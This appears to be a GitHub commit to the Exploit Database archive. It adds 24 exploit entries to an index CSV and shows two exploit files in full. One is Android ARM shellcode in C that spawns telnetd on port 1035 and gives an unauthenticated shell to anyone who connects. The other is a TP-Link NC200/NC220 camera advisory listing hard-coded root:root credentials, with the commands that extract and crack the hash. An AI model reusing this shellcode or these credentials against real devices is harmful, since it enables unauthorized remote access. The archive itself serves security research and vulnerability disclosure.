Skip to content

Commit fcfafeb

Browse files
author
Offensive Security
committed
DB: 2015-09-16
24 new exploits
1 parent 06b8156 commit fcfafeb

25 files changed

Lines changed: 2002 additions & 0 deletions

File tree

files.csv

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34451,6 +34451,8 @@ id,file,description,date,author,platform,type,port
3445134451
38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash PoC",2015-09-11,Mjx,windows,dos,0
3445234452
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
3445334453
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
34454+
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
34455+
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
3445434456
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
3445534457
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
3445634458
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
@@ -34483,3 +34485,25 @@ id,file,description,date,author,platform,type,port
3448334485
38182,platforms/php/webapps/38182.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
3448434486
38183,platforms/php/webapps/38183.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
3448534487
38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
34488+
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,"_ Un_N0n _",windows,local,0
34489+
38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
34490+
38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
34491+
38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
34492+
38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
34493+
38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80
34494+
38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple XSS Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
34495+
38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - CSRF Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
34496+
38194,platforms/android/shellcode/38194.c,"Android Shellcode Telnetd with Parameters",2015-09-15,"Steven Padilla",android,shellcode,0
34497+
38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL Vulnerability",2015-09-15,metasploit,windows,remote,0
34498+
38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload Vulnerability",2015-09-15,metasploit,php,remote,80
34499+
38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80
34500+
38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
34501+
38199,platforms/windows/local/38199.txt,"Windows NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0
34502+
38200,platforms/windows/local/38200.txt,"Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
34503+
38201,platforms/windows/local/38201.txt,"Windows CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
34504+
38202,platforms/windows/local/38202.txt,"Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
34505+
38205,platforms/multiple/dos/38205.py,"BT Home Hub 'uuid' field Buffer Overflow Vulnerability",2013-01-08,"Zachary Cutlip",multiple,dos,0
34506+
38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow Vulnerability",2013-01-09,"High-Tech Bridge",windows,remote,0
34507+
38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting Vulnerability",2013-01-09,"High-Tech Bridge",php,webapps,0
34508+
38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service Vulnerability",2013-01-09,Aph3x,multiple,dos,0
34509+
38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access Vulnerability",2013-01-10,Beni_Vanda,php,webapps,0
Lines changed: 245 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,245 @@
1+
/*
2+
Title: Android/ARM - telnetd with three parameters and an environment variable
3+
Date: 2015-07-31
4+
Tested on: Android Emulator and Samsung Note 10.1 (Android version 4.1.2)
5+
Author: Steven Padilla - email: spadilla@tresys.com
6+
Organization: Tresys LLC
7+
Vendor HomePage: www.tresys.com
8+
Version: 1.0
9+
10+
11+
Android ARM shellcode with dynamic string creation and including no
12+
0x20, 0x0a and 0x00.
13+
14+
This shellcode will execute telnetd listening on port 1035. Whenever
15+
anyone connects to port 1035 they will be presented with a shell
16+
prompt. This code assumes that telnetd and sh are executables in the
17+
/system/bin/ directory.
18+
19+
In order to minimize the length of the shellcode the beginning of the
20+
path /system/bin/ is created once and stored three times.
21+
22+
The executable name (/system/bin/telnetd), the other two paramaters
23+
(-p1035 and -l/system/bin/sh) and the environment variable
24+
(PATH=/system/bin) are strings that are created and stored in memory
25+
above the top of the stack. The strings are created by first moving a
26+
byte to register1, left shitf register1 8 bits, add the next byte,
27+
left shift again, add the next byte, left shift again and then adding
28+
the fourth byte. Note that due to endianess the bytes are added in
29+
reverse order. Thus if the string to be created is "/adb" the 'b'
30+
would be moved into r1, followed by the shift and then the 'd' is
31+
added, shift, then the 'a', shift, and finally the '/'.
32+
33+
In the example below the stack pointer has the value 0xbe91da08.
34+
35+
Right before calling the execve call (i.e., svc 1 with register 7 containing
36+
11) register0 is loaded with the 0xbe91da24, register1 is loaded with
37+
the 0xbe91da0c and register2 is loaded with 0xbe91da1c. The memory
38+
above the stack should look like the following (note to make it easier
39+
to read the strings are presented in the order they appear if you read
40+
them as strings. If you look at each word you will see the bytes in
41+
reverse order due to endianess) :
42+
43+
+----------------------------------+
44+
0xbe91da08 | NULL | This is where the stack
45+
| | pointer is pointing.
46+
+----------------------------------+
47+
0xbe91da0c | 0xbe91da24 | These first three entries
48+
| | are pointers to the path
49+
| | of the executable and its
50+
| | two parameters.
51+
+----------------------------------+
52+
0xbe91da10 | 0xbe91da50 |
53+
+----------------------------------+
54+
0xbe91da14 | 0xbe91da5f |
55+
+----------------------------------+
56+
0xbe91da18 | NULL | The list of parameters must
57+
| | be terminated by a NULL.
58+
+----------------------------------+
59+
0xbe91da1c | 0xbe91da88 | This points to the first
60+
| | (and only) environment
61+
| | variable.
62+
+----------------------------------+
63+
0xbe91da20 | NULL | The list of environment
64+
| | variables must be terminated
65+
| | by a NULL.
66+
+----------------------------------+
67+
0xbe91da24 | "//system/bin/telnetd" | This is where the name of
68+
| | the executable and the first
69+
| | parameter is stored.
70+
+----------------------------------+
71+
0xbe91da50 | "-p1035" | This is where the second
72+
| | parameter is stored.
73+
+----------------------------------+
74+
0xbe91da5f | "-l/system/bin/sh" | This is where the third
75+
| | parameter is stored.
76+
+----------------------------------+
77+
0xbe91da88 | "PATH=/system/bin/" | This is where the first
78+
| | environment variable is
79+
| | stored.
80+
+----------------------------------+
81+
82+
*/
83+
84+
#include <stdio.h>
85+
#include <string.h>
86+
87+
char *SC = "\x01\x30\x8f\xe2" //add r3,pc, #1
88+
"\x13\xff\x2f\xe1" //bx r3
89+
"\x78\x46" //mov r0, pc
90+
"\x18\x30" //adds r0, 0x18
91+
"\x92\x1a" // subs r2,r2,r2
92+
"\x49\x1a" // subs r1, r1, r1
93+
94+
"\x6a\x44" // add r2, sp
95+
96+
"\x79\x21" // mov r1, 'y'
97+
"\x09\x02" // LSL r1,r1, #8
98+
"\x73\x31" // adds r1, 's'
99+
"\x09\x02" // LSL r1,r1, #8
100+
"\x2f\x31" // adds r1, '/'
101+
"\x09\x02" // LSL r1,r1, #8
102+
"\x2f\x31" // adds r1, '/'
103+
"\x07\x91" // str r1, [sp, #4]
104+
105+
"\x12\x25" // mov r5, 0x12
106+
"\x4d\x40" // eor r5,r1
107+
"\x21\x95" // str r5, [sp, #4]
108+
109+
"\x43\x25" // mov r5, 0x43
110+
"\x4d\x40" // eor r5,r1
111+
"\x16\x95" // str r5, [sp, #4]
112+
113+
"\x6d\x21" // mov r1, 'm'
114+
"\x09\x02" // LSL r1,r1, #8
115+
"\x65\x31" // adds r1, 'e'
116+
"\x09\x02" // LSL r1,r1, #8
117+
"\x74\x31" // adds r1, 't'
118+
"\x09\x02" // LSL r1,r1, #8
119+
"\x73\x31" // adds r1, 's'
120+
"\x08\x91" // str r1, [sp, 0x8]
121+
"\x17\x91" // str r1, [sp, 0x17]
122+
"\x22\x91" // str r1, [sp, 0x22]
123+
124+
"\x6e\x21" // mov r1, 'n'
125+
"\x09\x02" // LSL r1,r1, #8
126+
"\x69\x31" // adds r1, 'i'
127+
"\x09\x02" // LSL r1,r1, #8
128+
"\x62\x31" // adds r1, 'b'
129+
"\x09\x02" // LSL r1,r1, #8
130+
"\x2f\x31" // adds r1, '/'
131+
"\x09\x91" // str r1, [sp, 0x9]
132+
"\x18\x91" // str r1, [sp, 0x18]
133+
"\x23\x91" // str r1, [sp, 0x23]
134+
135+
"\x6c\x21" // mov r1, 'l'
136+
"\x09\x02" // LSL r1,r1, #8
137+
"\x65\x31" // adds r1, 'e'
138+
"\x09\x02" // LSL r1,r1, #8
139+
"\x74\x31" // adds r1, 't'
140+
"\x09\x02" // LSL r1,r1, #8
141+
"\x2f\x31" // adds r1, '/'
142+
"\x28\x24" // mov r4, 0x0f
143+
"\x11\x51" // str r1, [r2, r4]
144+
145+
"\x6c\x25" // mov r5, 'l'
146+
"\x2d\x02" // LSL r1,r1, #8
147+
"\x0d\x35" // adds r5, 0x0d
148+
"\x2d\x02" // LSL r1,r1, #8
149+
"\x07\x35" // adds r5, 0x07
150+
"\x2d\x02" // LSL r1,r1, #8
151+
"\x4d\x40" // eor r5,r1
152+
"\x19\x95" // str r5, [sp, 0x19]
153+
154+
"\x64\x21" // mov r1, 'd'
155+
"\x09\x02" // LSL r1,r1, #8
156+
"\x74\x31" // adds r1, 't'
157+
"\x09\x02" // LSL r1,r1, #8
158+
"\x65\x31" // adds r1, 'e'
159+
"\x09\x02" // LSL r1,r1, #8
160+
"\x6e\x31" // adds r1, 'n'
161+
"\x0b\x91" // str r1, [sp, 0xb]
162+
163+
"\x49\x1a" // subs r1, r1, r1
164+
"\x0c\x91" // str r1, [sp, 0xc]
165+
166+
"\x30\x21" // mov r1, '0'
167+
"\x09\x02" // LSL r1,r1, #8
168+
"\x31\x31" // adds r1, '1'
169+
"\x09\x02" // LSL r1,r1, #8
170+
"\x70\x31" // adds r1, 'p'
171+
"\x09\x02" // LSL r1,r1, #8
172+
"\x2d\x31" // adds r1, '-'
173+
"\x12\x91" // str r1, [sp, #44]
174+
175+
"\x49\x1a" // subs r1, r1, r1
176+
"\x35\x31" // add r1, '5'
177+
"\x09\x02" // LSL r1,r1, #8
178+
"\x33\x31" // adds r1, '3'
179+
"\x13\x91" // str r1, [sp, 0x13]
180+
181+
"\x49\x1a" // subs r1, r1, r1
182+
"\x14\x91" // str r1, [sp, 0x14]
183+
184+
"\x2d\x21" // mov r1, '-'
185+
"\x09\x02" // LSL r1,r1, #8
186+
"\x09\x02" // LSL r1,r1, #8
187+
"\x09\x02" // LSL r1,r1, #8
188+
"\x15\x91" // str r1, [sp, 0x15]
189+
190+
"\x49\x1a" // subs r1, r1, r1
191+
"\x1f\x91" // str r1, [sp, 0x1f]
192+
193+
"\x48\x21" // mov r1, 'H'
194+
"\x09\x02" // LSL r1,r1, #8
195+
"\x54\x31" // adds r1, 'T'
196+
"\x09\x02" // LSL r1,r1, #8
197+
"\x41\x31" // adds r1, 'A'
198+
"\x09\x02" // LSL r1,r1, #8
199+
"\x50\x31" // adds r1, 'P'
200+
"\x80\x24" // mov r4, 0x0f
201+
"\x11\x51" // str r1, [r2, r4]
202+
203+
"\x2f\x21" // mov r1, '/'
204+
"\x24\x91" // str r1, [sp, 0x24]
205+
206+
"\x04\x32" // add r2, 0x4
207+
208+
"\x49\x1a" // subs r1, r1, r1
209+
"\x11\x1c" // add r1, r2, #0
210+
"\x18\x31" // add r1, 0x18
211+
"\x01\x91" // str r1, [sp, 0x1]
212+
213+
"\x2c\x31" // add r1, #40
214+
"\x02\x91" // str r1, [sp, 0x2]
215+
216+
"\x0f\x31" // add r1, #4
217+
"\x03\x91" // str r1, [sp, 0x3]
218+
219+
"\x29\x31" // add r1, #28
220+
"\x05\x91" // str r1, [sp, #0x5]
221+
222+
"\x49\x1a" // subs r1, r1, r1
223+
"\x04\x91" // str r1, [sp, 0x4]
224+
225+
"\x06\x91" // str r1, [sp, 0x6]
226+
227+
"\x10\x1c" // add r0, r2, #0
228+
"\x18\x30" // add r0, 0x18
229+
230+
"\x11\x1c" // add r1, r2, #0
231+
232+
"\x10\x32" // adds r2, 0x10
233+
234+
"\xdb\x1a" // subs r3, r3, r3
235+
236+
237+
"\x0b\x27" //movs r7,#11
238+
"\x01\xdf"; //svc 1
239+
240+
int main(void)
241+
{
242+
(*(void(*) ()) SC) ();
243+
return 0;
244+
}
245+
Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
2+
Vendor: TP-LINK Technologies Co., Ltd.
3+
Product web page: http://www.tp-link.us
4+
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
5+
NC200 V1 2.0.15 Build 150701 Rel.20962
6+
7+
Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
8+
fast and trouble free way to keep track on what's going on in and around
9+
your home. Video monitoring, recording and sharing has never been easier
10+
with the use of TP-LINK’s Cloud service. The excitement of possibilities
11+
never end.
12+
13+
Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux
14+
distribution image. These sets of credentials (root:root) are never exposed
15+
to the end-user and cannot be changed through any normal operation of the
16+
camera.
17+
18+
Tested on: Linux
19+
20+
21+
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
22+
@zeroscience
23+
24+
25+
Advisory ID: ZSL-2015-5255
26+
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
27+
28+
29+
20.07.2015
30+
31+
--
32+
33+
34+
Initializing...
35+
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
36+
root_uImage
37+
p2048_newroot.cer
38+
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
39+
Nproot:x:0:
40+
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
41+
root@zslab:~# john crack.me
42+
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
43+
root (root)
44+
guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying:
45+
root - Userroot
46+
Use the "--show" option to display all of the cracked passwords reliably
47+
root@zslab:~# john crack.me --show
48+
root:root:0:0:Linux User,,,:/home/root:/bin/sh
49+
50+
1 password hash cracked, 0 left
51+
root@zslab:~#

0 commit comments

Comments
 (0)